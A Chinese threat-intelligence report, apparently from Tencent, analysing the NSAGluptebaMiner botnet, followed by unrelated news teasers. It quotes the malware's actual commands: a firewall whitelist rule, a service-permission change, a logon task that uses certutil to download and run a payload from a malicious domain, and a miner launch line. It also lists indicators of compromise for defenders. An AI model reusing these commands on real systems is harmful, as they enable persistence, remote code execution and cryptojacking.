感谢腾讯御见威胁情报中心来稿!
原文链接:https://mp.weixin.qq.com/s/mdgGiYwb722GuE6QtJTzPQ
腾讯安全威胁情报中心检测到挖矿僵尸 *** NSAGluptebaMiner变种正在利用永恒之蓝漏洞攻击传播。目前该僵尸 *** 会控制机器进行门罗币挖矿和搜集用户隐私数据,并具有远程执行命令的功能,同时还会利用比特币交易数据更新C2。
cloudnet.exe原来是Glupteba恶意木马,Glupteba最早作为Operation Windigo组织用于部署僵尸 *** 中的一部分首次出现,2018年6月腾讯安全威胁情报中心发现cloudnet.exe开始作为挖矿僵尸 *** NSAGluptebaMiner的组件传播。
当前NSAGluptebaMiner版本具有以下特征:
漏洞攻击成功后,Payload首先下载app.exe在内存中执行PE文件,并且将该文件释放到C:\Windows\rss\csrss.exe,csrss.exe是一个木马下载器,采用Go编程语言编写。
下载器首先获取当前应用程序信息、安装杀软信息、操作系统信息、硬件GPU、是否Admin用户,以及一些以二进制形式硬编码的信息来初始化“配置信息”,然后创建一个注册表项HKEY_CURRENT_USER\Software\Microsoft\<random>(8位随机字符)来存储所有获取的信息。(之前注册表为HKEY_USERS\ <sid>\Software\Microsoft\TestApp)
首先会检测是否在虚拟机中执行。
然后判断是否是系统权限,如果不是则通过以TrustedInstaller运行自己提高权限。
在”C:\Windows\System32\drivers\”目录下释放三个隐藏的sys文件,并加载对应的驱动程序:
维护以系统服务的方式启动的木马(检查服务、下载安装服务、更新服务、删除服务)。
下载永恒之蓝漏洞漏洞利用程序,利用漏洞攻击局域网机器。
下载矿机和挖矿 *** 配置信息。
获取Glupteba僵尸 *** *** 程序Cloudnet.exe使用的下载地址和hash。
在handleCommand函数中实现后门功能,包括下载文件、程序执行等。
各函数及对应操作如下:
从区块链交易数据中获取加密的新的C2地址
设置防火墙规则,将csrss.exe添加到白名单:
`netsh advfirewall firewall add rule name=”csrss” dir=in action=allow program=”C:\Windows\rss\csrss.exe” enable=yes`
写入windows defender规则,添Winmon、WinmonFS、WinmonProcessMonitor加到白名单:
cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
安装名为“ScheduledUpdate”的计划任务,任务内容为:每当用户登陆时,利用certutil.exe下载app.exe,保存为scheduled.exe并运行:
`schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR “cmd.exe /C certutil.exe -urlcache -split -f https[:]//biggames.online/app/app.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340” /TN ScheduledUpdate /F`
灵活更新C2:
通过公开的列表查询Electrum比特币钱包服务器,使用硬编码的hash值查询对应的区块链脚本hash记录,对返回的数据进行AES解密得到新的C2地址。
组件updateprofile.exe为密码提取器,也使用Go编写,并使用UPX壳保护。
运行后搜集包括Chrome,Opera和Yandex浏览器的cookie、历史记录和其他配置文件中的账号密码,打包上传到远程服务器。
组件cloudnet.exe负责构建僵尸 *** , 会读取注册表中存放的UUID进行校验,在注册表“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下写入文件版本、路径等信息,移动自身到“\cloudnet\”文件夹下,连接C2服务器,接收远控指令。
组件wup.exe负责挖矿门罗币,csrss.exe启动wup.exe时传递参数
`C:\Users\Administrator\AppData\Local\Temp\wup\wup.exe -o stratum+tcp[:]//premiumprice.shop:50001 -u d244dab5-f080-4e0d-a79c-4eeb169b351b -p x –nicehash -k –api-port=3433 –api-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –http-port=3433 –http-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –donate-level=1 –randomx-wrmsr=-1 –background`
Temp目录下的wup.exe负责下载矿机程序和挖矿配置文件,最后执行另一同名文件C:\Users\Administrator\AppData\Local\Temp\csrss\wup\xarch\wup.exe开启挖矿,该文件由开源挖矿程序XMRig编译。
企业网管可以使用腾讯T-Sec终端安全管理系统清除病毒。
也可检查以下各项,如有进行清除:
目录和文件:
C:\Users\Administrator\AppData\LoCal\Temp\Csrss\ *** b\
C:\users\administrator\appdata\loCal\temp\Csrss\
C:\Windows\rss\Csrss.exe
C:\Windows\windefender.exe
C:\Windows\System32\drivers\Winmon.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\WinmonProCessMonitor.sys
C:\users\administrator\appdata\loCal\temp\Csrss\Cloudnet.exe
C:\Users\Administrator\AppData\LoCal\Temp\Csrss\sCheduled.exe
C:\Users\Administrator\AppData\LoCal\Temp\Csrss\updateprofile.exe
C:\Users\Administrator\AppData\LoCal\Temp\wup\wup.exe
C:\Users\Administrator\AppData\LoCal\Temp\Csrss\wup\xarCh\wup.exe
注册表:
HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\TestApp
HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\<random>\<random>
HKEY_CURRENT_USER\SOFTWARE\EpiCNet InC.\CloudNet
HKEY_CURRENT_USER\Software\MiCrosoft\<random>
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\Winmon
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonFS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonProCessMonitor
HKEY_USERS\sid\Software\MiCrosoft\Windows\CurrentVersion\Run\DeliCateFrost
计划任务:
ScheduledUpdate
Domain
biggames.club
biggames.online
deepsound.live
sndvoices.com
2makestorage.com
infocarnames.ru
URL
http[:]//biggames.club/app/app.exe
https[:]//infocarnames.ru/ru53332/-RTMD-AIyBxl2ebgAAvhwCAEVTFwAfAOm6EgMA.exe
md5
b1c081429c23e3ef0268fd33e2fe79f9
da75bc9d4d74a7ae4883bfa66aa8e99b
00201e5ad4e27ff63ea32fb9a9bb2c2e
6918fd63f9ec3126b25ce7f059b7726a
fcf8643ff7ffe5e236aa957d108958c9
9b47b9f19455bf56138ddb81c93b6c0c
0dbecc91932301ccc685b9272c717d61
矿池:
premiumprice.shop:50001
以美国为首的“五眼”网络安全部门,刚刚向其盟友(包括英国、加拿大、澳大利亚和新西兰)发出了关键网络基础设施的维护警告。美国家安全局(NSA)给出的理由是 —— 受俄罗斯支持的黑客组织,或对乌克兰境内外的组织构成更大的风险 —— 因而建议各组织对相关网络威胁保持高度警惕,并遵循联合咨询中提当过的缓解...
利用新冠疫情,网络犯罪分子发起各种攻击而尽可能地牟利。欧盟网络安全机构 Enisa 强调,这类活动导致雇佣黑客在过去 15 个月中成为网络安全的最大威胁。 2020 年 4 月至 2021 年 7 月进行的研究的年度报告中,Enisa 表示 COVID-19 疫情期间观察到网络犯罪分子加大了针对潜在...
一个流传了6个月的骗局已经发展到影响iOS用户。黑客利用社交媒体、约会应用程序、加密货币和滥用苹果公司企业开发者计划,从毫无戒心的受害者那里盗取了至少140万美元。 名为CryptoRom欺诈的实施相当直接,在通过社交媒体或现有数据应用程序获得受害者的信任后,用户被愚弄安装一个修改版的加密货币交易所...
据外媒报道,根据医疗保健公司Revere Health上周五发布的新闻稿称,一名医疗保健员工沦为一个网络钓鱼邮件攻击的对象,由此泄露了约1.2万名患者的一些医疗记录–其中包括圣乔治的心脏病患者。 Revere Health营销和沟通主管Bob Freeze表示,6月21日,这名员工的电子邮件被侵入了...
据ZDNet报道,新加坡政府与美国政府签署了几份谅解备忘录,以扩大他们在国防、银行和研究与开发等领域的网络安全合作。这些活动包括增加信息共享、团队建设、培训和技能发展。 在美国副总统卡马拉·哈里斯为期三天的访问中的周一签署了三份谅解备忘录。其中一个是新加坡和美国网络安全和基础设施安全局之间的协议,...
由安全专家、研究人员和网络工程师们组成的 Zscaler ThreatLabz 团队,刚刚曝光了一款名为 Win32.PWS.FFDroider 的新型恶意软件。据悉,这款基于 Windows 平台的恶意软件,能够创建一个名为 FFDroider 的注册表项,并将窃取到的凭据和 cookie 发送到...